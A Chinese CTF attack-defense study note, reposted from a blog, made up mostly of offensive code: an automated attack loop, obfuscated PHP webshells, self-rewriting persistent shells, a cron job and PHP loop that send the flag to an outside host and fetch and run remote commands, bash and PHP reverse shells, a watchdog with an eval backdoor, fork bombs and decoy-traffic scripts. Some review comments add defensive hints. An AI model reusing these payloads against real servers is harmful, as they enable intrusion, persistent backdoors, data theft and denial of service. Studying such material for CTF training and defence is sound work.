CTF 学习笔记 04--CTF攻击流程

## 全自动全场开火

全场开火框架:
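def main():
    """Run ``exploit_all`` once per round, then idle until the next round.

    Round length and the in-round wait are hard-coded below; the wait is half
    the round, presumably so a slow ``exploit_all`` still finishes before the
    next round starts.  Runs forever (Ctrl-C to stop).  ``exploit_all`` is
    defined elsewhere in this file and ``time`` is assumed to be imported.
    """
    print("[+] Starting attack framework...")
    round_time = 60 * 5
    print("[+] Round time : %s seconds..." % (round_time))
    # Integer division: ``range`` below needs an int (``/`` is a float
    # division on Python 3).
    wait_time = round_time // 2
    print("[+] Wait time : %s seconds..." % (wait_time))
    while True:
        exploit_all()
        print("[+] This round is finished , waiting for the next round...")
        # Count down one second at a time so progress is visible on the console.
        for remaining in range(wait_time, 0, -1):
            print("[+] The next attack is %d seconds later..." % (remaining))
            time.sleep(1)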

if __name__ == "__main__":
    # NOTE(review): in this listing the guard sits before ``exploit`` and
    # ``exploit_all`` are defined, so running the file top to bottom raises
    # NameError inside main(); it belongs at the end of the file.
    main()

def exploit(host, port):
    """Fetch the flag from one target and pass it to the submission helper.

    ``get_flag``, ``submit_flag`` and the global ``token`` are defined outside
    this block.
    """
    submit_flag(get_flag(host, port), token)

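def exploit_all():
    """Read ``host:port`` lines from the ``targets`` file and call ``exploit`` on each.

    Blank lines are skipped instead of raising, so a trailing newline in the
    file does not abort the whole round.  The original listing had every line
    at the same indent (an IndentationError); the nesting below is the
    obvious intent.  ``exploit`` is defined elsewhere in this file.
    """
    with open("targets") as f:                # the whole field's ip:port list has to be collected first
        for line in f:
            line = line.strip()
            if not line:
                continue
            parts = line.split(":")
            host = parts[0]
            port = int(parts[1])
            print("[+] Exploiting : %s:%d" % (host, port))
            exploit(host, port)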

## RCE (远程命令执行)之后 
*    写入webshell文件
webshell最好有一定的伪装性,文件名可以以 . 开头。

对于不同肉鸡上的webshell设置不同密码,防止别人用你的马来收flag。

<?php /* the /e modifier makes preg_replace() eval() the replacement string -- here the raw POST field 'h' -- as PHP; /e was removed in PHP 7.0, so this only works on PHP 5 */ @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
<?php
// Obfuscated shell: every string below is a function name or a base64 blob
// with junk characters spliced in, and str_replace() strips the junk again.
$uf="snc3";
$ka="IEBldmFbsK";
$pjt="CRfUE9TVF";
$vbl = str_replace("ti","","tistittirti_rtietipltiatice");  // -> "str_replace"
$iqw="F6ciddKTs=";
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");  // -> "base64_decode"
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");  // -> "create_function"
// The four fragments (minus every "b") base64-decode to " @eval($_POST['sqzr']);",
// which create_function() wraps in an anonymous function that is then called.
// create_function() was removed in PHP 8; a str_replace/base64_decode/
// create_function chain built from literals is a standard file-scanner signature.
$mpy = $sbp('', $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw))); $mpy();
?>

<?php
// Same idea with chr(): $_uU becomes the string "chr" and is then used as a
// function name to spell out the real payload one character at a time.
$_uU=chr(99).chr(104).chr(114);
echo $_uU;
// $_cC spells "eval($_POST[1]);" and $_fF spells "create_function" (the
// statement is wrapped across a blank line in this listing).  Note the two
// echo calls: the response body leaks "chr" and the decoded payload, which
// makes this variant easy to spot in captured traffic.
$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).

$_uU(110);
echo $_cC;
// create_function("", "eval($_POST[1]);") and call it
$_=$_fF("",$_cC);@$_();
?>
eval($_POST[1])

*    写入内存(不死)马

eval型:
def write_memery_webshell(url, directory, password):
    """Plant a self-rewriting ("immortal") eval shell on the target via ``code_exec``.

    The PHP string built below never returns: it disables abort-on-disconnect
    and the time limit, then rewrites ``<directory>/.<password>.php`` every
    ``sleep_time`` microseconds.  For the defending side this means deleting
    the dot-file alone is not enough; the PHP worker running the loop has to
    be terminated as well.  ``code_exec`` is defined elsewhere in this file.
    Returns the lines of ``code_exec``'s output without the trailing empty
    element.
    """
    sleep_time = 500 # micro second
    code = "<?php $content = '<?php eval(base64_decode($_REQUEST[%s]));?>'; $writable_path = '%s'; $filename = '.%s.php'; $path = $writable_path.'/'.$filename; ignore_user_abort(true); set_time_limit(0);      while(true){ if(file_get_contents($path) != $content){ file_put_contents($path, $content); } usleep(%d); }?>" % (password, directory, password, sleep_time)
    # NOTE(review): the next line is dedented to column 0 in the original
    # listing, which is an IndentationError as pasted; it belongs at function indent.
filename = ".%s.php" % (password)
    path = "%s/%s" % (directory, filename)
    # str.encode("base64") is a Python 2 codec; the line breaks it inserts
    # every 76 chars are stripped so the blob survives as one PHP string literal.
    payload = "file_put_contents('%s', base64_decode('%s'));" % (path, code.encode("base64").replace("\n", ""))
    print payload
    # Drop the empty element left after the final newline of the output.
    return code_exec(url, payload).split("\n")[0:-1]
shell型:
def write_memery_webshell(url, directory, password):
    """Same as the eval variant above, but delivered through ``shell_exec``.

    The planted file takes the request parameter as raw PHP (no base64 layer).
    The loop it runs keeps re-creating the dot-file, so on the defending side
    the PHP worker process has to be killed, not just the file removed.
    ``shell_exec`` is defined elsewhere in this file.
    """
    sleep_time = 500 # micro second
    code = "<?php $content = '<?php eval($_REQUEST[%s]);?>'; $writable_path = '%s'; $filename = '.%s.php'; $path = $writable_path.'/'.$filename; ignore_user_abort(true); set_time_limit(0); while(true){      if(file_get_contents($path) != $content){ file_put_contents($path, $content); } usleep(%d); }?>" % (password, directory, password, sleep_time)
    # NOTE(review): dedented to column 0 in the original listing (IndentationError
    # as pasted); it belongs at function indent like the lines around it.
filename = ".%s.php" % (password)
    path = "%s/%s" % (directory, filename)
    # Python 2 only codec; newlines stripped so the blob is a single PHP literal.
    payload = "file_put_contents('%s', base64_decode('%s'));" % (path, code.encode("base64").replace("\n", ""))
    # Drop the empty element left after the final newline of the output.
    return shell_exec(url, payload).split("\n")[0:-1]
唤醒内存马:
def active_memery_webshell(url):
    """Request the planted dot-file once so its infinite loop starts running.

    The request is expected to time out (0.5 s) because the target script
    never returns, so the bare ``except`` treats any exception as success and
    prints OK.  It also swallows KeyboardInterrupt; ``except Exception`` would
    be the narrower choice.  For defenders, a PHP worker that never finishes a
    request is the observable footprint of this technique.
    """
    try:
        requests.get(url, timeout=0.5)
    except:
        print "[+] OK!"

*    写入crontab(计划任务)

让对方机器提交自己的flag:攻击者的token
// Persistence and exfiltration planted after RCE.  The listing has no <?php
// tag and the while loop below is never closed, so it is truncated.
// Cron line: once a minute, curl the flag together with the attacker's
// submission token to the attacker host, i.e. the victim box submits its own flag.
$message="* * * * * curl 192.168.136.1:8098/?flag=$(cat /var/www/html/flag)&token=7gsVbnRb6ToHRMxrP1zTBzQ9BeM05oncH9hUoef7HyXXhSzggQoLM2uXwjy1slr0XOpu8aS0qrY";
ignore_user_abort(true);   // keep running after the HTTP client disconnects
set_time_limit(0);         // no execution time limit
while (true) {
$x =file_get_contents('/var/www/html/flag');
// direct exfiltration every 5 s, independent of cron
file_get_contents('http://192.168.136.1:8099/test.php?token=kericwy&flag='.$x);
sleep(5);
// rewrite the crontab through a temp file; `crontab` invoked by the web-server
// user is a cheap audit/alert signal on the defending side
system("echo '$message' > /tmp/1 ;");
system("crontab /tmp/1;");
system("rm /tmp/1;");
// fetch and run whatever the remote file holds: command execution driven by
// a URL, so egress from the web user to this host is worth blocking
$c=file_get_contents('http://192.168.136.1:8100/1.txt');
system($c);

*    反弹shell

 在bash下可以运行:

        bash -i >& /dev/tcp/127.0.0.1/4444 0>&1

php反弹:需要在目标机器安装php环境

        php -r '$sock=fsockopen("127.0.0.1","4444");exec("/bin/sh -i <&3 >&3 2>&3");' 

python反弹:

        python -c 'import pty; pty.spawn("/bin/bash")'


*    进程守护 (监控文件是否存在 没有的话自动安装)

# Bash half of a bash<->php mutual-restart pair (the PHP half follows; the
# closing `done` of this loop is missing from the listing).  bash_lock_file,
# php_lock_file, sleep_time, php_url, target_path, start_url and time_out are
# expected to be set before this loop.
while [[ : ]]; do          # always true: ":" is a non-empty string
# tell php that i am living
echo "Creating lock file..."
touch -a ${bash_lock_file}    # bump atime; the PHP side checks fileatime() on this path
# check php is living or not
# NOTE: stat runs before the -f test below, so a missing lock file prints a
# stat error and leaves last_access_time empty.
last_access_time=`stat -c %X ${php_lock_file}`
now_time=`date +%s`
echo "php last alive time : ${last_access_time}"
echo $[ $now_time - $last_access_time ];      # $[ ] is deprecated; $(( )) is the POSIX form
# "dead" when the lock file is missing or not touched within one sleep period
if [ ! -f "${php_lock_file}" ] || [ $[ $now_time - $last_access_time ] -gt $((sleep_time+1)) ]; then
echo "[-] php script is dead!"
echo "downloading php script"
# re-fetch the PHP side and kick it over HTTP; for defenders, wget/curl
# spawned under the web-server user is the signal here
wget ${php_url} -O $target_path && curl ${start_url} -m ${time_out}
else
echo "PHP script is alive..."
fi
# sleeping
echo "sleeping..."
sleep ${sleep_time}
// PHP half of the watchdog pair (no <?php tag in the listing).  $bash_url,
// $php_lock_file, $bash_lock_file, $bash_path and $code_url are expected to be
// set above.
ignore_user_abort(true);   // survive client disconnect
set_time_limit(0);         // run indefinitely
$sleep_time = 3; // max sleep_time : 3 seconds
$content = file_get_contents($bash_url);   // bash script fetched once, at start-up
while(true){
// tell bash that i am living
echo "Telling bash that i am alive...\n";
touch($php_lock_file);
echo "PHP Lock file last accessed : ".(time() - fileatime($php_lock_file))."\n";
// check bash is living or not
echo "Checking the bash script is alive or not...\n";
// "dead" when the bash lock file is missing or its atime is older than one period
if(!(file_exists($bash_lock_file) && ((time() - fileatime($bash_lock_file)) < ($sleep_time + 1)))){
echo "The bash script is dead!\n";
// download bash script
echo "Downloading bash script...\n";
@file_put_contents($bash_path, $content);
// restart bash script
echo "Restarting bash script...\n";
// a bash child detached with nohup under the PHP worker: an unusual process
// tree for php-fpm/apache and a reliable hunt signal
@popen('nohup bash '.$bash_path.' &', 'r');
}
// control loop speed
echo "Sleeping...\n";
sleep($sleep_time);
// backdoor
echo "Executing backdoor...";
// every iteration fetches PHP from a remote URL and eval()s it: this is the
// actual remote-control channel; block egress to $code_url and kill the worker
@eval(file_get_contents($code_url));
}

*    fork炸弹(dos攻击) 让目标机down机双倍扣分

eval型: 疯狂创建新进程,占用资源而变慢,以至于最后爆掉
def main():
    """Send a fork-bomb string to a hard-coded host through ``code_exec``.

    The payload defines a shell function that spawns itself without bound, so
    the target stalls once its process limit is reached.  A per-user process
    cap for the web-server account (``ulimit -u`` / cgroup ``pids.max``)
    bounds the damage on the receiving side.  ``code_exec`` is defined
    elsewhere in this file.
    """
    host = "192.168.50.57"
    port = "80"
    url = "http://%s:%s/code.php" % (host, port)
    code = "system(\"echo '.() { .|.& } && .' > /tmp/aaa\");system(\"/bin/bash /tmp/aaa\");echo \"seems good!\";"
    print code_exec(url, code)
shell型:
def main():
    """Same as the eval variant, sent as a raw shell command through ``shell_exec``.

    Hard-coded host/port; ``shell_exec`` is defined elsewhere in this file.
    Process limits on the target (``ulimit -u`` / ``pids.max``) are the
    standard mitigation.
    """
    host = "127.0.0.1"
    port = "80"
    url = "http://%s:%s/c.php" % (host, port)
    command = ":(){ :|: & };:"
    shell_exec(url, command)

*    垃圾流量生成

为了减少payload被别人轻易获取并重放,我们需要不断释放大量的垃圾流量。最好里面有众多的flag字符串来扰乱敌人的分析。

比赛开始,完成基础的运维工作后,运维手就可以往外打垃圾流量了,需要贯穿整个比赛流程。

从题目源码中获取真实参数:
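def get_all(root, arg):
    """Collect the ``arg`` parameters used by every ``.php`` file under ``root``.

    Walks ``root`` recursively and returns a list of
    ``("/" + filename, find_arg(content, arg))`` tuples.  ``get_content`` and
    ``find_arg`` are defined elsewhere in this file.  Only the bare filename is
    kept, so two files with the same name in different directories are not
    told apart.  Renamed the locals ``all`` and ``file`` that shadowed builtins
    and switched to ``os.path.join`` for the path.
    """
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            full_path = os.path.join(dirpath, name)
            content = get_content(full_path)
            found.append(("/" + name, find_arg(content, arg)))
    return found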

def main():
    """Print the GET, POST and COOKIE parameter map for the current directory."""
    root = "."
    for source in ("_GET", "_POST", "_COOKIE"):
        print(get_all(root, source))

垃圾流量生成:
def get_fake_plain_payloads(flag_path):
    """Return decoy PHP snippets that all appear to read ``flag_path``.

    They are only meant as noise in captured traffic.  The order is fixed so
    callers can pair each entry with its base64 form.
    """
    templates = (
        'system("cat %s");',
        'highlight_file("%s");',
        'echo file_get_contents("%s");',
        'var_dump(file_get_contents("%s"));',
        'print_r(file_get_contents("%s"));',
    )
    return [template % (flag_path) for template in templates]

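def get_fake_base64_payloads(flag_path):
    """Return the decoy payloads from ``get_fake_plain_payloads`` base64-encoded.

    Uses the ``base64`` module instead of the ``"base64"`` str codec, which
    only exists on Python 2 and inserts a line break every 76 characters
    (the original stripped those by hand).  Output order matches the plain
    list.
    """
    import base64
    encoded = []
    for payload in get_fake_plain_payloads(flag_path):
        raw = base64.b64encode(payload.encode("utf-8"))
        encoded.append(raw.decode("ascii"))
    return encoded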

def main():
    """Print the decoy payload list in plain and base64 form for a fixed flag path."""
    flag_path = "/home/web/flag/flag"
    for builder in (get_fake_plain_payloads, get_fake_base64_payloads):
        print(builder(flag_path))
垃圾流量发射:
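def handle_get(url, root, flag_path):
    """Build one GET request per (php file, $_GET parameter, decoy payload).

    ``url`` must end with ``/``; ``root`` is the directory scanned by
    ``get_all``.  Plain and base64 decoy payloads are handled in one pass
    instead of two copied loops, and the indentation of the original listing
    (which did not parse) is repaired.  Returns unprepared
    ``requests.Request`` objects.  ``get_all``, ``get_fake_plain_payloads``
    and ``get_fake_base64_payloads`` are defined elsewhere.
    """
    all_requests = []
    payloads = get_fake_plain_payloads(flag_path) + get_fake_base64_payloads(flag_path)
    for path, args in get_all(root, "_GET"):
        # If get_all matches the listing on this page it yields "/" + filename;
        # slicing off len("./") then drops the first letter of the name, so
        # strip whichever prefix is actually present.
        relative = path[2:] if path.startswith("./") else path.lstrip("/")
        for arg in args:
            # find_arg (defined elsewhere) is assumed to return "$_GET['name']" -- confirm
            name = arg[len("$_GET['"):-len("']")]
            for payload in payloads:
                new_url = "%s%s?%s=%s" % (url, relative, name, payload)
                all_requests.append(requests.Request("GET", new_url))
    return all_requests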
fake.request.py:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
import threading
import time
import random

from core.obfs.fake_payloads import *
from core.obfs.get_arg import *

timeout = 0.1  # seconds; per-request send timeout used by send_http -- short on purpose, responses are discarded

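def send_http(request):
    """Prepare and fire ``request`` once, best effort.

    The response is discarded; any error (timeout, refused connection, DNS
    failure, bad URL) is printed and swallowed so one dead target does not
    stop the sender.  ``timeout`` is the module-level constant.  The session
    is now closed on every path instead of being left to the garbage
    collector.
    """
    prepared = request.prepare()
    # Close the session (and its pooled connections) even when send raises.
    with requests.Session() as session:
        try:
            session.send(prepared, timeout=timeout)
        except Exception as e:
            print(e)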

def handle_single_http(request):
    """Thread target: fire one request through ``send_http`` and discard the result."""
    return send_http(request)

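def handle_get(url, root, flag_path):
    """Build one GET request per (php file, $_GET parameter, decoy payload).

    ``url`` must end with ``/``; ``root`` is the directory scanned by
    ``get_all``.  Plain and base64 decoy payloads are handled in one pass
    instead of two copied loops.  Returns unprepared ``requests.Request``
    objects.  ``get_all`` and the ``get_fake_*`` helpers come from the
    ``core.obfs`` imports.
    """
    all_requests = []
    payloads = get_fake_plain_payloads(flag_path) + get_fake_base64_payloads(flag_path)
    for path, args in get_all(root, "_GET"):
        # If get_all matches the listing on this page it yields "/" + filename;
        # slicing off len("./") then drops the first letter of the name, so
        # strip whichever prefix is actually present.
        relative = path[2:] if path.startswith("./") else path.lstrip("/")
        for arg in args:
            # find_arg is assumed to return "$_GET['name']" -- confirm in core.obfs.get_arg
            name = arg[len("$_GET['"):-len("']")]
            for payload in payloads:
                new_url = "%s%s?%s=%s" % (url, relative, name, payload)
                all_requests.append(requests.Request("GET", new_url))
    return all_requests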

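def handle_post(url, root, flag_path):
    """Build one POST request per (php file, $_POST parameter, decoy payload).

    Same structure as ``handle_get``; the payload travels in the form body
    under the parameter name instead of the query string.  The two copied
    payload loops are merged and ``data`` is passed to the constructor rather
    than assigned afterwards.  Returns unprepared ``requests.Request`` objects.
    """
    all_requests = []
    payloads = get_fake_plain_payloads(flag_path) + get_fake_base64_payloads(flag_path)
    for path, args in get_all(root, "_POST"):
        # If get_all matches the listing on this page it yields "/" + filename;
        # slicing off len("./") then drops the first letter of the name.
        relative = path[2:] if path.startswith("./") else path.lstrip("/")
        new_url = "%s%s" % (url, relative)
        for arg in args:
            # find_arg is assumed to return "$_POST['name']" -- confirm in core.obfs.get_arg
            name = arg[len("$_POST['"):-len("']")]
            for payload in payloads:
                request = requests.Request("POST", new_url, data={name: payload})
                all_requests.append(request)
    return all_requests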

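def handle_cookie(url, root, flag_path):
    """Build one GET request per (php file, $_COOKIE parameter, decoy payload).

    Same structure as ``handle_get``; the payload is carried as a cookie
    named after the parameter.  The two copied payload loops are merged and
    ``cookies`` is passed to the constructor rather than assigned afterwards.
    Returns unprepared ``requests.Request`` objects.
    """
    all_requests = []
    payloads = get_fake_plain_payloads(flag_path) + get_fake_base64_payloads(flag_path)
    for path, args in get_all(root, "_COOKIE"):
        # If get_all matches the listing on this page it yields "/" + filename;
        # slicing off len("./") then drops the first letter of the name.
        relative = path[2:] if path.startswith("./") else path.lstrip("/")
        new_url = "%s%s" % (url, relative)
        for arg in args:
            # find_arg is assumed to return "$_COOKIE['name']" -- confirm in core.obfs.get_arg
            name = arg[len("$_COOKIE['"):-len("']")]
            for payload in payloads:
                request = requests.Request("GET", new_url, cookies={name: payload})
                all_requests.append(request)
    return all_requests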

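def get_targets(path="targets"):
    """Read ``host:port`` pairs from ``path`` (default: ``targets`` in the cwd).

    Blank lines are skipped, so a trailing newline no longer raises
    ``ValueError`` from ``int("")``; a non-empty line without a port raises a
    ``ValueError`` naming the line instead of a bare ``IndexError``.  Returns a
    list of ``(host, port)`` tuples with ``port`` converted to ``int``.
    """
    targets = []
    with open(path) as f:
        for line in f:
            line = line.strip()
            if not line:
                continue
            parts = line.split(":")
            if len(parts) < 2:
                raise ValueError("expected host:port, got %r" % (line,))
            targets.append((parts[0], int(parts[1])))
    return targets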

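def main():
    """Generate decoy requests for every target and send them spread over one round.

    Two defects of the original are fixed: ``len(all_requests) / round_time``
    was an integer division on Python 2 (0 for fewer than 60 requests, then
    ``ZeroDivisionError`` in the loop), and an empty target or request list
    crashed the same way.  The send loop still starts one thread per request
    and joins it immediately, so sending is effectively sequential, as before.
    """
    flag_path = "/home/web/flag/flag"
    root = "./sources"
    round_time = 60
    all_requests = []
    for host, port in get_targets():
        print("-" * 32)
        print("[+] Generating requests to fake %s:%d" % (host, port))
        url = "http://%s:%d/" % (host, port)
        for builder in (handle_get, handle_post, handle_cookie):
            print("[+] Requests number : [%d]" % (len(all_requests)))
            all_requests += builder(url, root, flag_path)

    if not all_requests:
        print("[-] No requests generated, nothing to send")
        return
    # Spread the batch evenly across the round; float division so a batch
    # smaller than round_time gives a sub-1 rate instead of 0.
    each_second = len(all_requests) / float(round_time)
    print("[+] Each second should send %d requests" % (each_second))
    sleep_time = 1.0 / each_second  # loop-invariant, hoisted out of the loop
    random.shuffle(all_requests)
    for request in all_requests:
        print("[+] Sleeping %f seconds" % (sleep_time))
        time.sleep(sleep_time)
        print("[+] Sending http requests ...")
        print("%s => %s" % (request.method, request.url))
        thread = threading.Thread(target=handle_single_http, args=(request,))
        thread.start()
        thread.join()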


if __name__ == "__main__":
    # Entry point guard; kept at the end of the file so every helper above is
    # already defined when main() runs.
    main()

*    流量重放

对于attacker而言,流量的快速同步和好用的流量分析机制是非常有用的,对于可疑的流量,应该快速粘贴到burp等工具中进行测试,如果可以攻击则使用script-gen等插件迅速生成攻击脚本并整合到攻击框架中。

*    把流量dump下来:

            scp -r gamebox:/ctfer/logs/ ./

            也可以使用定时脚本的方式。

*    由burp生成EXP的神器:

            http://www.kericwy.xyz/files/scriptgen-burp-plugin-6.jar

        



转载自blog.csdn.net/qq_38055050/article/details/80722563